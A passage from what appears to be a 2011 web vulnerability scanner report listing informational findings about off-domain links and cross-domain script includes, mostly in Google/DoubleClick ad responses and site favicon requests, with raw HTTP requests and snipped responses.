Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12514

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cwe-79-xss-dork-www.ovh.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DEarnMyDegree.com/Art%2526amp%253BDesign%26adT%3DCreative%2BWriting%2BPrograms%26adU%3Dwww.intacct.com/AccountingSoftware%26adT%3DAccounting%2BSolutions%26adU%3Ddegree-online.NECB.edu%26adT%3DBusiness%2BDegree%2BOnline%26gl%3DUS&amp;usg=AFQjCNE-5W91cwD_d2YaBnCFXVqxic7x2Q" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.42. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-dork-example-poc.html&dt=1301749091012&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749091023&frm=0&adk=1607234649&ga_vid=100666562.1301749091&ga_sid=1301749091&ga_hid=1244546770&ga_fc=0&u_tz=-300&u_his=25&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=PbvtqD9hJU&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:35 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4688

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CL3YltbNzsrb1QEQ2AUYWjIIFpzmYEJETKg">
...[SNIP]...
APcBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtyyGLVJePvP2aUc73kP8LJSTHLxjA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CL3YltbNzsrb1QEQ2AUYWjIIFpzmYEJETKg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBu6tdPh2XTeLpMouBlgf52eSUCd7theEBjp-7zhGWk9-WScDnmQEQARgBIL7O5Q04AFD-ueqD-P____8BYMkGoAHu8sn5A7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBBNoBU2h0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni14c3MtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZG9yay1leGFtcGxlLXBvYy5odG1sgAIBuAIYwAIFyALu5LYUqAMB6AML6AMF6APcBfUDAAAAxA%26num%3D1%26sig%3DAGiWqtyyGLVJePvP2aUc73kP8LJSTHLxjA%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://lovealocalbusiness.intuit.com/fan%253Fcid%253Dsoc_gg_lalb__fan%2526vtid%253Dgsem" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss-cross-site-scripting-dork-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLoveALocalBusiness.Intuit.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGIC15NtbOfVYFN1sRg7WeKtvL4Qg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.43. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998823&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcwe-79-cross-site-scripting.www.norwich.edu.html&dt=1301748286996&bpp=7&shv=r20110324&jsv=r20110321-2&correlator=1301748287035&frm=0&adk=1607234649&ga_vid=466867705.1301748287&ga_sid=1301748287&ga_hid=1424854655&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=124&xpc=dzY5B8mbRX&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/cwe-79-cross-site-scripting.www.norwich.edu.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DAPC.com/DataCenterUniversity%26adT%3DServer%2BInstallation%26adU%3Dwww.Datapipe.com%26adT%3DNeed%2Ba%2BVirtualized%2BServer%26adU%3Dwww.Supermicro.com%26adT%3D6-Core%2B4-Way%2BSuperServers%26gl%3DUS&amp;usg=AFQjCNHCytgDL5YW50Pj1t3CWkebMZVVVw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20. Cross-domain script include
There are 48 instances of this issue:


20.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N1260.Google.com/B5219922.27;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiFx0Dh2XTaX3Ic7ilQf6iqHVCPux5J4C25fY3hvAjbcB4JuQAhABGAEgvs7lDTgAUJT5_pcHYMkGoAHN19niA7IBBnhzcy5jeLoBCTcyOHg5MF9hc8gBCdoBUGh0dHA6Ly94c3MuY3gvZXhhbXBsZXMvaHRtbC9jYXBlYy04Ni1kb3JrLXhzcy1jcm9zcy1zaXRlLXNjcmlwdGluZy1leGFtcGxlcy5odG1suAIYyAKzq8AcqAMB0QNb5as_VmQv-OgDigPoAx_oAwX1AwAAAMQ&num=1&sig=AGiWqtxII5ILhYzUahUeLNR8TnlD6RZSPQ&client=ca-pub-4063878933780912&adurl=;ord=879784873? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749042824&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749042836&frm=0&adk=1607234649&ga_vid=1243467471.1301749043&ga_sid=1301749043&ga_hid=1328169759&ga_fc=0&u_tz=-300&u_his=21&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=E2Nhb6Q087&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7149
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 02 Apr 2011 12:56:48 GMT
Expires: Sat, 02 Apr 2011 12:56:48 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Jan 06 11:17:25 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...

20.2. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2178764;type=newkc987;cat=kcomh345;ord=1;num=2714251752477.139? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; BE_CLA=p_id%3D2L8PRN68LAAPR28ANNL404NJ22AH628422%26p_last_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26s_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26p_first_ref%3Dhttp%253A//quickbooksonline.intuit.com/bookkeeping-accounting-systems/%253Fsc%253DQBC-V51-SUF-HMEPGE%26p_first_entry%3Dhttp%253A//fls.doubleclick.net/activityi%253Bsrc%253D1996823%253Btype%253Dfmsco864%253Bcat%253Dqbosi086%253Bord%253D1%253Bnum%253D7793246807996.184%253F%26s_expire%3D1300726794236%26s_id%3DJL8PRN68LAAPRJP844P404NJ22AH628422; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 02 Apr 2011 13:57:06 GMT
Expires: Sat, 02 Apr 2011 13:57:06 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1088

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- Start of Standa
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

20.3. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766285&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcwe-79-cross-site-scripting.www.norwich.edu.html&dt=1301748285145&bpp=5&shv=r20110324&jsv=r20110321-2&correlator=1301748285207&frm=0&adk=1607234649&ga_vid=1031013934.1301748285&ga_sid=1301748285&ga_hid=1004053173&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=982&bih=1004&fu=0&ifi=1&dtd=94&xpc=4iHGLQIcCW&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:44:10 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4656

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.4. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998819&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss-dork-cwe79-imp.fetchback.com.html&dt=1301749134308&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749134321&frm=0&adk=1607234649&ga_vid=1705879164.1301749134&ga_sid=1301749134&ga_hid=930736349&ga_fc=0&u_tz=-300&u_his=29&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&eid=33895132&fu=0&ifi=1&dtd=18&xpc=OPFNo6cnem&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:58:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 13559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.5. http://www.411.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.411.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:01 GMT
Status: 200 OK
X-Runtime: 0.02831
ETag: "28868ff376e29e9093907243f62f8121"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=A; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:01 GMT
Set-Cookie: wp_perm=pid%3D_LLdoF0uEeCxcgAeC-lzfg; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: _wpn_sid=7494deac6a51f7c62e310ec573d0b582; domain=.411.com; path=/
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
</script>


<script src="http://js.revsci.net/gateway/gw.js?csid=A06546" type="text/javascript"></script>
...[SNIP]...

20.6. http://www.800notes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.800notes.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.800notes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:57:37 GMT
Content-Length: 2068

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>Access Denied</title><meta name="SKYPE_TOOLBAR" content="SKY
...[SNIP]...
<link rel="shortcut icon" href="http://r.octonet.com/favicon.ico" /><script type="text/javascript" src="http://r.octonet.com/sys/oos-js.ashx/1.2/en-US.js"></script>
...[SNIP]...

20.7. http://www.androidcentral.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.androidcentral.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidcentral.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: spe
Date: Sat, 02 Apr 2011 14:06:31 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
Set-Cookie: SESSff98d42578ac6106ce5b7f80c23f307a=hr1onak19pbmm2diiqpgglrca2; expires=Mon, 25-Apr-2011 17:39:51 GMT; path=/; domain=.androidcentral.com
Last-Modified: Sat, 02 Apr 2011 14:00:10 GMT
ETag: "acfc4415a958e438545290ed1f077f57"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 367789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Home |
...[SNIP]...
<div class="content">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</noscript>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://track.netshelter.net/js/sites/androidcentral.com.js"></script>
...[SNIP]...

20.8. http://www.biglots.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.biglots.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biglots.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:57 GMT
Server: Apache/2.2.17 (Win32) mod_ssl/2.2.15 OpenSSL/0.9.8o mod_jk/1.2.31
Set-Cookie: JSESSIONID=9EE15E1A14FD5B47D59D04701296C03D.108prd3; Path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=utf-8
Content-Length: 30138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- layouts/mai
...[SNIP]...
<![endif]-->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.9. http://www.bizjournals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizjournals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4Y2Y3Njg3MGZlZjhjIjt9%7C1301751544%7C6cb798d646d7838561076324272978f8ff136b64cfb9b8dd5c0d4c55c0436ed1; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4ZDBiNThjNWNlMGIzIjt9%7C1301751544%7Cb769a95f8358eec5ae178a6877548f04d46f0bba7d768b809293bbbf75c88a93; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
ServerID: 3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45605

